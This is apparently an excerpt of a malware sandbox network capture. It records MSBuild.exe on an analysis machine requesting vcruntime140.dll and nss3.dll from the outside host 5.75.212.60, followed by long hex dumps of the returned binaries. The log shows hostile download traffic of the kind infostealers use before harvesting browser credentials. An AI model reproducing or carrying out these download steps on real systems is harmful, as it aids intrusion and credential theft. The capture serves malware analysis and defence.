                                                                                      Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d
                                                                                      Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00
                                                                                      Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00
                                                                                      Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74
                                                                                      Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4
                                                                                      Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00
                                                                                      Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c
                                                                                      Data Ascii: ]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18
                                                                                      Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.4497525.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:15 UTC246OUTGET /vcruntime140.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:15 UTC259INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:15 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 80880
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:15 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-07-26 01:18:15 UTC16125INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                      2024-07-26 01:18:15 UTC16384INData Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42
                                                                                      Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
                                                                                      2024-07-26 01:18:15 UTC16384INData Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20
                                                                                      Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
                                                                                      2024-07-26 01:18:15 UTC16384INData Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12
                                                                                      Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                      2024-07-26 01:18:15 UTC15603INData Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f
                                                                                      Data Ascii: @L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.4497535.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:16 UTC238OUTGET /nss3.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:17 UTC261INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:16 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2046288
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:16 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-07-26 01:18:17 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51
                                                                                      Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQ
                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b
                                                                                      Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d
                                                                                      Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10
                                                                                      Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00
                                                                                      Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
